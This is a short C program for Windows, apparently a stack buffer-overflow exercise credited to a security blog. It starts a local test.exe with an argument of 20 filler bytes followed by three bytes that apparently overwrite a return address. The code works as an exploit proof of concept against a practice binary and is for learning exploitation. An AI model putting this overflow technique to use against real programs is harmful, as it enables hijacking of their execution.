#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>

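/*
 * Exploit 3 - 0vercl0k.blogspot.com: starts "test.exe" with a crafted
 * command line.  The argument is 20 filler bytes ('a') followed by the
 * three fixed bytes in `ret`.  The program labels itself an exploit
 * exercise; the layout of test.exe's stack frame and what the trailing
 * bytes are meant to land on are not visible here (the variable name
 * suggests a return address -- unconfirmed).
 *
 * Returns 0 when the child was created and has exited, 1 when allocation,
 * formatting or CreateProcess fails.  The original version ignored all of
 * these failures and waited on a NULL process handle when CreateProcess
 * failed.
 */
int main(void)
{
    STARTUPINFO si = {0};
    PROCESS_INFORMATION pi = {0};
    si.cb = sizeof(si);

    /* Trailing bytes appended after the filler; kept verbatim.  The array
     * holds 3 bytes plus the NUL, so strlen(ret) is 3. */
    char ret[] = "\xF1\x12\x40";

    /* Program name plus the separating space; CreateProcess parses the rest
     * of the buffer as the child's argument string. */
    char name[] = "test.exe ";

    /* 20 filler bytes, NUL-terminated.  Small and fixed-size, so a stack
     * array replaces the unchecked (and never freed) malloc. */
    char remplissage[21];
    memset(remplissage, 'a', sizeof remplissage - 1);
    remplissage[sizeof remplissage - 1] = '\0';

    /* Total command-line length plus the terminating NUL. */
    size_t alloc = strlen(name) + strlen(remplissage) + strlen(ret) + 1;

    /* Heap buffer rather than a literal: the Win32 documentation allows
     * CreateProcess (the W variant in particular) to modify lpCommandLine
     * in place, so the buffer must be writable. */
    char *exploitation = malloc(alloc);
    if (exploitation == NULL) {
        fprintf(stderr, "malloc failed\n");
        return 1;
    }

    /* snprintf always NUL-terminates; the length check guards against any
     * future change to the three pieces that would exceed `alloc`. */
    int written = snprintf(exploitation, alloc, "%s%s%s", name, remplissage, ret);
    if (written < 0 || (size_t)written >= alloc) {
        fprintf(stderr, "command line truncated\n");
        free(exploitation);
        return 1;
    }

    printf("Exploit 3 - 0vercl0k.blogspot.com.\n\nCreation du processus..\n");
    if (!CreateProcess(NULL, exploitation, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi)) {
        /* pi is still zeroed here; report the Win32 error instead of
         * waiting on a NULL handle as the original did. */
        fprintf(stderr, "CreateProcess failed (error %lu)\n", GetLastError());
        free(exploitation);
        return 1;
    }
    printf("Processus cree.\n");

    /* Block until the child exits, then release both kernel handles. */
    WaitForSingleObject(pi.hProcess, INFINITE);
    CloseHandle(pi.hProcess);
    CloseHandle(pi.hThread);
    free(exploitation);
    return 0;
}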